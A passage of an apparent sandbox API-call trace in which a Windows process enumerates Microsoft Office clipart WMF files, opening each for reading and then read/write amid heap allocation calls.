Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0102.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.960] AreFileApisANSI () returned 1 [0102.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 69 [0102.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.960] GetFileType (hFile=0x33c) returned 0x1 [0102.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.960] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.961] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.961] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.961] CloseHandle (hObject=0x33c) returned 1 [0102.961] AreFileApisANSI () returned 1 [0102.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 69 [0102.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.961] GetFileType (hFile=0x33c) returned 0x1 [0102.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.961] CloseHandle (hObject=0x33c) returned 1 [0102.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.963] AreFileApisANSI () returned 1 [0102.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 69 [0102.963] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cec)) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0102.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.963] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00921_.WMF", cAlternateFileName="")) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.964] AreFileApisANSI () returned 1 [0102.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.964] AreFileApisANSI () returned 1 [0102.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 69 [0102.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.965] GetFileType (hFile=0x33c) returned 0x1 [0102.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.965] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.965] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.965] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.965] CloseHandle (hObject=0x33c) returned 1 [0102.966] AreFileApisANSI () returned 1 [0102.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 69 [0102.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.966] GetFileType (hFile=0x33c) returned 0x1 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.966] CloseHandle (hObject=0x33c) returned 1 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.967] AreFileApisANSI () returned 1 [0102.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 69 [0102.967] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1138)) returned 1 [0102.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.968] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1870, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00923_.WMF", cAlternateFileName="")) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.968] HeapFree (in: 